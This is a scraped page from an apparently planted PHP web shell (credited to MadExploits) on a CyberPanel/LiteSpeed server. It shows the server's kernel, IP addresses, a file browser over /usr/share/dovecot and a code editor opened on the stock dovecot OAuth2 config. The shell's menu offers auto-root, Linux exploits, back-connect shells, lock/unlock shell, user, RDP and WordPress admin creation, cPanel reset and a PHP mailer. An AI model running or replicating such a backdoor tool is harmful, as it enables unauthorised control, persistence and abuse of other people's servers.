Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
dovecot /
[ HOME SHELL ]
Name
Size
Permission
Action
conf.d
[ DIR ]
drwxr-xr-x
protocols.d
[ DIR ]
drwxr-xr-x
stopwords
[ DIR ]
drwxr-xr-x
dh.pem
769
B
-rw-r--r--
dovecot-dict-auth.conf.ext
1.47
KB
-rw-r--r--
dovecot-dict-sql.conf.ext
522
B
-rw-r--r--
dovecot-oauth2.conf.ext
2.13
KB
-rw-r--r--
dovecot-openssl.cnf
542
B
-rw-r--r--
dovecot-sql.conf.ext
5.69
KB
-rw-r--r--
dovecot.conf
4.24
KB
-rw-r--r--
mkcert.sh
862
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dovecot-oauth2.conf.ext
### OAuth2 password database configuration ## url for verifying token validity. Token is appended to the URL # tokeninfo_url = http://endpoint/oauth/tokeninfo?access_token= ## introspection endpoint, used to gather extra fields and other information. # introspection_url = http://endpoint/oauth/me ## How introspection is made, valid values are ## auth = GET request with Bearer authentication ## get = GET request with token appended to URL ## post = POST request with token=bearer_token as content ## local = perform local validation only # introspection_mode = auth ## Force introspection even if tokeninfo contains wanted fields ## Set this to yes if you are using active_attribute # force_introspection = no ## Validation key dictionary (e.g. fs:posix:prefix=/etc/dovecot/keys/) ## Lookup key is /shared/<azp:default>/<alg>/<kid:default> # local_validation_key_dict = ## A single wanted scope of validity (optional) # scope = something ## username attribute in response (default: email) # username_attribute = email ## username normalization format (default: %Lu) # username_format = %Lu ## Attribute name for checking whether account is disabled (optional) # active_attribute = ## Expected value in active_attribute (empty = require present, but anything goes) # active_value = ## Expected issuer(s) for the token (space separated list) # issuers = ## URL to RFC 7628 OpenID Provider Configuration Information schema # openid_configuration_url = ## Extra fields to set in passdb response (in passdb static style) # pass_attrs = ## Timeout in milliseconds # timeout_msecs = 0 ## Enable debug logging # debug = no ## Max parallel connections (how many simultaneous connections to open) # max_parallel_connections = 10 ## Max pipelined requests (how many requests to send per connection, requires server-side support) # max_pipelined_requests = 1 ## HTTP request raw log directory # rawlog_dir = /tmp/oauth2 ## TLS settings # tls_ca_cert_file = /path/to/ca-certificates.txt # tls_ca_cert_dir = /path/to/certs/ # tls_cert_file = /path/to/client/cert # tls_key_file = /path/to/client/key # tls_cipher_suite = HIGH:!SSLv2 # tls_allow_invalid_cert = FALSE
Close